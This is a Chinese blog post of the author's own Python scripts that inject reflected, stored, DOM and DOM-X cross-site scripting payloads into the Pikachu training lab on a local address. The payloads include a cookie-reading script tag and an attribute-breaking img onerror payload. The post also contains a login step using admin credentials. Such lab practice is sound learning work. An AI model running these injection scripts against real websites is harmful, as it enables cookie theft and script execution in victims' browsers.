pikachu自编exp,xss反射性get,post,存储型xss,dom,dom-x

xss反射性get,

post,

存储型xss,

dom,

dom-x

复制代码
#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS,DOM-X型注入点在HTML标签熟悉如(href),需要闭合属性引导,再注入恶意代码
复制代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_reflected_get.php"

payload = "<script>alert('1')</script>"

params = {
    "message":payload,
    "submit":"submit"
}

resp = requests.get(url,params=params)

print("="*50)
print("[+] 注入完成!")
print("检测漏洞是否注入成功: ",payload in resp.text)
复制代码
import requests

r = requests.Session()

log_url = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/post_login.php"
url = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/xss_reflected_post.php"

data = {
    "username":"admin",
    "password":"123456",
    "submit":"Login"
}

resp = r.post(log_url, data=data) #只需要保持会话,不需要内容就不用resp

payload = "<script>alert(document.cookie)</script>"

data2 = {
    "message":payload,
    "submit":"submit"
}

resp2 = r.post(url,data=data2)

print("[+] 语句已注入")
print("查询页面是否注入: ",payload in resp2.text)#注意看查询的resp2不是登录的resp小错误
复制代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_stored.php"

payload = "<script>alert('xss')</script>"

data = {
    "message":payload,
    "submit":"submit"
}

resp = requests.post(url, data=data)

print("[+] 完成注入!")
print("[+] 查看是否注入成功:",payload in resp.text)
复制代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom.php"

payload = "'><img src='' onerror='alert(1)'/>"

params = {"text":payload}

resp = requests.get(url,params=params)

print("[+] 注入完成!")
print("[+] 攻击url: ",resp.url)
复制代码
#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS,DOM-X型注入点在HTML标签熟悉如(href),需要闭合属性引导,再注入恶意代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom_x.php"

payload = "'><img src='' onerror='alert(1)'/>"

resp = requests.get(url,params = {"text":payload})

print("[+] 完成注入! ")
print(f"点击链接:{url}?text={payload}")
print(f" 查看回显 ")
相关推荐
子兮曰2 天前
jev-ultrafast 深度解析:7 秒订机票的浏览器 Agent 是如何炼成的
前端·后端·agent
子兮曰2 天前
Jev 爆发一周:7 秒 Agent 背后的 System One 生态与三场争议
前端·后端·ai编程
前端小万2 天前
写公众号赚了 3000 块后,我做了一款叫 "一键成稿" 的软件
前端·微信小程序
爱勇宝2 天前
ZCode 开源 24 小时:一份没有历史的账本,回答不了"有没有偷代码"
前端·后端·chatglm (智谱)
三十而立洋3 天前
Cookie 详解:从产生到安全,一次讲透
前端·javascript
卡布鲁3 天前
把一个 Vite + Vue3 应用塞进 qiankun (React + Umi3) 主站:十个坑的复盘
前端·javascript·react.js
李少兄3 天前
JavaScript 隐式全局变量解析
javascript
汉堡大王95273 天前
Jev:不是聊天机器人, 而是一个智能 if 语句
前端·人工智能·后端
梦想很大很大3 天前
从运行事实到回归证据:Workrun 的 Telemetry 与 Evaluation 实践
前端·人工智能·后端
计算机魔术师3 天前
Meta Muse agent 接入 Shopify 的 Shop Pay 实现代理式购物
前端